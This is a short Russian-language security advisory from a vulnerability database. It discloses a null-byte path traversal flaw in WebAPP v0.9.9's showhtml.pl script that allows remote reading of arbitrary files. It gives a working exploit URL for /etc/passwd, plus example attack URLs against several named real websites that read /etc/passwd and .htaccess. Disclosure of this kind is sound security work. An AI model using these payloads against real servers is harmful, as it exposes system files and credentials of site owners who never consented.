Security Advisory: еще один бажный скрипт в WebAPP v0.9.9. - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  PHP, ASP, CGI web applications security vulnerabilities
  [SA15173] enVivo!CMS SQL Injection Vulnerabilities
  [Full-disclosure] [ GLSA 200504-30 ] phpMyAdmin: Insecure SQL script installation
  [UNIX] All4WWW-
Homepagecreator site Parameter Command Execution
  Multiples Full Path Disclosure in php-nuke 7.6 (and below)

From: durito <durito_(at)_mail.ru>
Date: 30.04.2005
Subject: еще один бажный скрипт в WebAPP v0.9.9.

Здравствуйте, .
вот нашел еще новую узвимость в WebAPP v0.9.9..

Просмотр произвольных файлов в WebAPP Web Automated Perl Portal System v0.9.9.

Software / Application - WebAPP v0.9.9.
Problem-Type - удаленная
Vulnerability - возможность чтения файлов и просмотр каталогов.
Vendor - http://www.web-app.org
Risk / Severity - средний
Platforms - *.nix
Details / DESCRIPTION - Скрипт showhtml.pl выполняет проверку на
расширение открываемых файлов, но при вставке "null-byte poison"
отсекает расширение html, позволяя читать произвольные файлы.

Exploit -
http://www.xxx.com/cgi-bin/mods/showhtmlcgi/showhtml.pl?filename=../../../../../.
./etc/passwd%00.htm

durito [durito@mail.ru] LwB Security Team [lwb57.org]
Copyright 2002-2005 by LwB Security Team. All rights reserved.

Пример:
http://www.nubianeroticangels.com/cgi-bin/nea/mods/showhtmlcgi/showhtml.pl?filena
me=../../.htaccess%00.htm
http://www.nubianeroticangels.com/cgi-bin/nea/mods/showhtmlcgi/showhtml.pl?filena
me=../../../../../../etc/passwd%00.htm
http://www.erotiquencounters.com/cgi-bin/erotique/mods/showhtmlcgi/showhtml.pl?fi
lename=../../../../../../etc/passwd%00.htm

--
С уважением,
durito [LwB Security Team]                 mailto:durito@mail.ru
http://lwb57.org
http://durito.narod.ru

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

test server